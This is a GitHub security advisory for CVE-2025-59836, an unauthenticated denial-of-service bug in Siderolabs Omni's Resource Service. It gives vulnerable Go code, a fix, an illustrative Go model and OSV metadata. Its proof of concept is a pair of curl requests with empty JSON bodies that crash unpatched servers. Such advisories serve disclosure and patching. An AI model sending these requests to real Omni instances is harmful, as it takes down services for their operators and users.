ghsa-4p3p-cr38-v5xp
Vulnerability from github
Published: 2025-10-13 19:59
Modified: 2025-10-13 22:09
Summary
Omni is Vulnerable to DoS via Empty Create/Update Resource Requests
Details

Summary

A nil pointer dereference vulnerability in the Omni Resource Service allows unauthenticated users to cause a server panic and denial of service by sending empty create/update resource requests through the API endpoints.

Details

The vulnerability exists in the isSensitiveSpec function which calls grpcomni.CreateResource without checking if the resource's metadata field is nil. When a resource is created with an empty Metadata field, the CreateResource function attempts to access resource.Metadata.Version causing a segmentation fault.

Vulnerable Code

The isSensitiveSpec function in /src/internal/backend/server.go:

```go
func isSensitiveSpec(resource *resapi.Resource) bool {
    res, err := grpcomni.CreateResource(resource)  // No nil check on resource.Metadata
    if err != nil {
        return false
    }
    // ... rest of function
}
```

The CreateResource function expects resource.Metadata to be non-nil:

```go
func CreateResource(resource *resources.Resource) (cosiresource.Resource, error) {
    if resource.Metadata.Version == "" {  // PANIC: nil pointer dereference
        resource.Metadata.Version = "1"
    }
    // ... rest of function
}
```

The UpdateResource function has the same issue - it also calls CreateResource internally and expects resource.Metadata to be non-nil:

```go
func (s *ResourceServer) Update(ctx context.Context, in *resapi.UpdateRequest) (*resapi.UpdateResponse, error) {
    // ... validation code ...
    obj, err := CreateResource(in.Resource)  // Same vulnerability here
    if err != nil {
        return nil, err
    }
    // ... rest of function
}
```

Affected Endpoints

  • resourceServerCreate - Create Resource API endpoint
  • resourceServerUpdate - Update Resource API endpoint

Both endpoints call isSensitiveSpec which triggers the vulnerability when processing empty resources.

PoC

Send empty resource requests to the affected API endpoints:

```bash
# Create endpoint
curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Create" \
  -H "Content-Type: application/json" \
  -d '{}'

# Update endpoint
curl -X POST "https://your-omni-instance/api/omni.resources.ResourceService/Update" \
  -H "Content-Type: application/json" \
  -d '{}'
```

Expected Result: Server panic with segmentation fault:

```
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x8 pc=0x293d970]

goroutine 3305 [running]:
github.com/siderolabs/omni/internal/backend/grpc.CreateResource(0x3495420?)
        /src/internal/backend/grpc/resource.go:364 +0x20
```

Impact

  • Vulnerability Type: Denial of Service (DoS)
  • Severity: High - Complete API server crash requiring manual restart if no restart policy is applied.
  • Authentication: None required (unauthenticated)
  • Complexity: Low (simple HTTP request)

Mitigation

Add nil checks in the isSensitiveSpec function:

```go
func isSensitiveSpec(resource *resapi.Resource) bool {
    if resource == nil || resource.Metadata == nil {
        return false
    }
    res, err := grpcomni.CreateResource(resource)
    if err != nil {
        return false
    }
    // ... rest of function
}
```
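
A self-contained model of the failure and the guard, added here as an illustration and not taken from Omni's code base. The types, function names and the use of encoding/json for request decoding are hypothetical stand-ins, and the guard is placed at the point of dereference rather than in isSensitiveSpec so that the Update path described above is covered as well.

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Hypothetical stand-ins for the request types; not Omni's generated code.
type Metadata struct{ Version string }
type Resource struct{ Metadata *Metadata }
type UpdateRequest struct{ Resource *Resource }

// createUnchecked mirrors the pre-fix pattern from the advisory.
func createUnchecked(r *Resource) (string, error) {
	if r.Metadata.Version == "" { // panics when r or r.Metadata is nil
		r.Metadata.Version = "1"
	}
	return r.Metadata.Version, nil
}

// createChecked guards at the point of dereference, covering every caller.
func createChecked(r *Resource) (string, error) {
	if r == nil || r.Metadata == nil {
		return "", fmt.Errorf("invalid argument: resource metadata is required")
	}
	return createUnchecked(r)
}

// handleUpdate decodes a request body; "{}" leaves in.Resource nil.
func handleUpdate(body string, create func(*Resource) (string, error)) (string, error) {
	var in UpdateRequest
	if err := json.Unmarshal([]byte(body), &in); err != nil {
		return "", err
	}
	return create(in.Resource)
}

// panics reports whether f panics, i.e. what would crash an unprotected server.
func panics(f func()) (p bool) {
	defer func() { p = recover() != nil }()
	f()
	return false
}

func main() {
	for _, body := range []string{`{}`, `{"resource":{}}`, `{"resource":{"metadata":{}}}`} { // constructed
		v, err := handleUpdate(body, createChecked)
		fmt.Println(body, panics(func() { handleUpdate(body, createUnchecked) }), v, err)
	}
}
```

Both the fully empty body and a resource without metadata reach the dereference with a nil pointer, so a regression test for the fix should cover both shapes.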

Credits

  • @1c3t0rm
  • @nicomda


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.1.4"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siderolabs/omni"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.1.0-beta.0"
            },
            {
              "fixed": "1.1.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.1"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siderolabs/omni"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59836"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-476"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-13T19:59:17Z",
    "nvd_published_at": "2025-10-13T21:15:34Z",
    "severity": "MODERATE"
  },
  "id": "GHSA-4p3p-cr38-v5xp",
  "modified": "2025-10-13T22:09:25Z",
  "published": "2025-10-13T19:59:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/security/advisories/GHSA-4p3p-cr38-v5xp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59836"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/commit/1396083f766a1b0380e9949968d7fc17b7afecaa"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siderolabs/omni/commit/1fd954af64985a8b3dbf5b11deddbf7cd953f5ae"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siderolabs/omni"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Omni is Vulnerable to DoS via Empty Create/Update Resource Requests"
}

